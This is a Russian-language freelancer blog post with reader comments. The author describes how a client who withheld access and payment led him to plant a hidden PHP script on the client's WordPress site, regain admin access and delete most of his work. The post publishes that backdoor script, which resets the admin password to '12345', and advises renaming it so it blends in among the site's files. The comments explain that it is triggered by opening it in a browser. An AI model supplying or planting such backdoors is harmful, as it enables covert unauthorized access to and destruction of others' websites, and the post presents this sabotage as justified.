Блог о программировании, электронике и рыбалке

Защита от недобросовестных заказчиков при выполнении заказов по WordPress

Главная » PHP » Защита от недобросовестных заказчиков при выполнении заказов по WordPress

Уверен, что многие фрилансеры сталкивались с недобросовестными заказчиками, которые после завершения всех работ тянут с оплатой или просто пропадают, закрывая вам доступ к вашему творению. Две недели назад и я получил такой же неприятный опыт. Я выполнял заказ на создание сайта-визитки одной небольшой компании. Моя задача заключалась в создании блога на WordPress с нуля, его SEO оптимизации и минимальной раскрутке. Заказчик предоставил тему оформления и ТЗ. Перед сдачей проекта я связался с заказчиком, чтобы обсудить кое какие нюансы. Показал почти готовый проект, заказчик его осмотрел и отключился без всяких комментариев. Я сперва решил, что у него пропала связь и продолжил работу над проектом. Но не тут то было. Заказчик сменил пароли на FTP и на доступ в админку блога. Я был в шоке.

Отправил ему сообщение, что работы не закончены и мне еще нужен доступ. Также отправил ему список незаконченных заданий. К вечеру доступ был открыт и присланы извинения за данное недоразумение. Вся вина была возложена на неопытного сотрудника, который по каким-то причинам решил сменить все пароли. Я решил подстраховаться и залил на блог небольшой скрипт, который способен сменить пароль администратора на блоге под управлением WordPress. Через пару дней заказ был сдан и заказчик сразу пропал, сменив все пароли. Ни по Skype, ни по ICQ, ни по электронной почте он мне не отвечал. Я обождал неделю и сменил пароль на блоге. Вошел в админку и удалил большую часть своей работы (благо хостинг позволял удалять файлы без запроса пароля). В тот же вечер получил письмо от заказчика с ругательствами и проклятиями в мой адрес. В вину мне вписали непомерно высокие цены, хотя за работу я просил $100, из которых оплачивал домен на год и хостинг на пол года.

В заключении хочу с вами поделиться тем скриптом, который меняет пароль пользователя admin на 12345 на блоге под управлением WordPress. Залейте его в корень сайта и переименуйте файл на что-то похожее из тех, что там расположены.

<?php
require_once('wp-load.php');
require_once('wp-includes/registration.php');
$u['ID'] = 1;
$u['user_pass'] = '12345'; # New password for user ID = 1
if (wp_update_user($u)) echo 'OK';
else echo "Error";
?>

wp-pass2.rar (251 bytes, 287 hits)

А вообще, большинство заказчиков очень хорошие люди. Не стоит расстраиваться из-за редких исключений. В любом случае мы получаем опыт, а это не оценить деньгами. Желаю всем фрилансерам хороших заказов. Пускай ваш труд всегда оплачивается достойно.

  • infoЗащита от недобросовестных заказчиков при выполнении заказов по WordPress
    • Автор:
    • Язык: ru-RU
    • Миниатюра: https://geekelectronics.org/wordpress/zashhita-ot-nedobrosovestnyx-zakazchikov-pri-vypolnenii-zakazov-po-wordpress.html
    • Рубрика: PHP Wordpress
    • Метки: , , ,
    • Обновлено: 06.12.2011
    • Комментариев: 6
    • Просмотров: 1 254
logo
  • Сергей:

    ну допустим я его кинул в корень и как мне им воспользоваться когда поменяют пароли? после какой команды поменяется пароль? я чего то не понимаю.

    • source™:

      просто откройте его в браузере, указав путь к этому файлу на вашем сайте

  • Юрий:

    Здравствуйте!
    Экспериментирую на Денвере.
    Вызываю скрипт через адресную строку браузера.
    Открывается страница с надписью ОК, а пароль от админки не изменяется.
    Вместо admin использую другой логин и уже один раз менял его на другое имя.
    Может быть после этого изменился ID?
    Подскажите, пожалуйста, что надо сделать для нормальной работы скрипта?
    Спасибо.

  • Игорян:

    Короче, да встречаются же иногда такие ублюдки. Так их! Скрибздец да, простецко-гениальный.

Добавить комментарий